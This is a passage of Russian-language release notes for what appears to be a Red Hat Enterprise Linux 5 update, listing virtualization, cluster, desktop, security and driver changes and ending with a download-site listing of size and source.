• Добавлена поддержка Intel VT-i2 для ia64 CPU;
• Ротация логов Xen;
• Хранилище Xenstore перенесено в tmpfs;
• В поставку включены паравиртуализационные драйверы для ядер Red Hat Enterprise Linux 5 работающих в роли гостевых систем в режиме полной виртуализации. В установке пакета xenpv-kmod более нет необходимости;

Кластеры:
• Поддержка зеркалирования кластеров;
• Поддержка файловой системы GFS2 (ранее GFS2 была помечена как Technology Preview).
• В агенты DRAC, Blade Center, iLO и Egenera добавлена поддержка SSH;
• В WTI агенте реализована поддержка контроллеров управления питанием WTI RSM8R4 и WTI MPC-8H

Десктоп:
• GUI интерфейс для настройки сети NetworkManager 0.7, в котором добавлены средства для настройки работы в 3G сетях, расширены возможности по конфигурированию PPP и PPPOE соединений. Возможность графической настройки adhoc режима работы беспроводной карты для прямого соединения двух компьютеров. • Возможность одновременной активации нескольких соединений. Возможность активации сетевого соединения до входа пользователя в систему.
• Обновлены версии драйверов для графических карт, обеспечена поддержка карт ATI r400/r500.
• Системные сервисы и утилиты:
• Поддержка Kerberos в сервере печати cups;
• Обновлены программы в пакетах ksh, lm-sensors, lftp, net-snmp, openIPMI, openldap, openmotif, python-urlgrabber, rpm, tog-pegasus, vnc, yum, yum-utils;
• SystemTap (аналог DTrace для Linux): добавлена начальная поддержка трассировки приложений на уровне пользователя (utrace), реализована возможность удаленной компиляции SystemTap сценариев, добавлено руководство пользователя, произведены оптимизации.
• Отладчик GDB обновлен до версии 6.8;

Шифрование и безопасность:
• Поддержка шифрования корня системы и раздела подкачки в инсталляторе;
• Возможность перехода в Hibernate режим (временное засыпание со сбросом дампа памяти на диск) при наличии шифрованных дисковых разделов;
• В SELinux добавлена поддержка нового NetworkManager и средств аудита;
• Улучшены возможности аудита и журналирования событий (добавлена поддержка аудита TTY ввода и сохранения логов системы аудита на другую машину, через нешифровный канал связи);
• Пакет Samba обновлен до версии 3.0.32, в которой появилась поддержка Windows Vista и Windows 2008;
• В пакет с Linux ядром, основанный на версии 2.6.18, перенесены многие новые возможности из последних релизов 2.6.x, например, в dm-raid появилась поддержка RAID 4/5/10, добавлен AMD IOMMU драйвер, в реализации CIFS/SMB появилась поддержка DFS, обновлен код Autofs4

Поддержка нового оборудования:
• Добавлены новые драйверы: ath5k, hp-ilo, inet_lro, neic, niu, r8169, t2x00, rtl818x, uvcvideo, virtio
• Обновлены драйверы: 3w-9xxx, 3w-xxxx, aacraid, aic94xx, alsa, arcmsr, bcm43xx, bnx2, bnx2x, cciss, chelsio, cpufreq, cxgb3, e1000, e1000e, fusion, hpiolo, ibmvscsi, igb, ieee80211, ipw2x00, iwlwifi, ixgbe, lpfc, mac80211, megaraid_sas, mptscsi, myri10ge, netxen-nic, OpenIB, powernow_k8, qla2xxx, qla24xx, qla84xx, sata, sata_svw, tg3, zd1211rw
• Экспериментальные возможности для тестирования (Technology Previews):
AIGLX в X server, обновленная библиотека Mesa, композитный менеджер Compiz;
• Установка dm-multipath;
• Dogtail - ПО для автоматического тестирования GUI интерфейсов;
• Поддержка eCryptFS;
• Поддержка файловой системы ext4;
• Пакет с GCC 4.3;
• Возможность загрузки с iSCSI;
• Новый Firewire стек;
• ktune - сервис определяющий системные профайлы с определенным набором параметров тюнинга ядра;
• 32-bit PV guest на 64-bit хостовой системе AMD64/Intel 64
• Поддержка стека Trusted Computing Group (TCG) и Trousers TSS;
• Агент VMware ESX;

Размер: 2.89 Gb
Добавлено 3% на восстановление
Источник free-admin.net
Скачать